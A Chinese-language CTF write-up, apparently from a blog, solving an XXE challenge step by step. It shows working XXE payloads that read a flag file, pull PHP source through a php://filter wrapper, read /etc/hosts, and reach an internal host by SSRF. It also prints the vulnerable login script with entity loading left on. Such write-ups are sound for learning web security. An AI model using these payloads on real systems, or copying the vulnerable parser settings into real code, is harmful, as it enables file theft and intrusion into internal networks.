我准备发两份,一份发到这里,另一份发到CSDN上面,这里的内容浏览器不好搜到,别人看不到,无趣
第二道xxe类型的题了。Content-Type: application/xml;charset=utf-8
看看这熟悉的内容,好吧,第一道payload为
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "./flag.txt">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
根据响应报错,判断关键文件为doLogin.php文件,用php伪协议读一下,第二道payload与base64解码后的doLogin.php文件分别为:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
<?php
/**
* autor: c0ny1
* date: 2018-2-7
*/
$USERNAME = 'admin'; //账号
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; //密码
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
没啥用,原来xxe利用的方式还有许多,比如下面就要用到的,访问内网中的主机,先使用file读取etc/hosts的内容,这payload为
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "file:///etc/hosts">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
响应内容为
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
173.122.253.10 osrc
看起来就像是win里面的hosts一样,应该是为了相同的目的。
读flag
payload为
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
<!ENTITY xxe SYSTEM "http://173.122.253.11">
]>
<user><username>&xxe;</username><password>&xxe;</password></user>
这里flag就在http://173.122.253.11 的下一个,可以,获得了flag。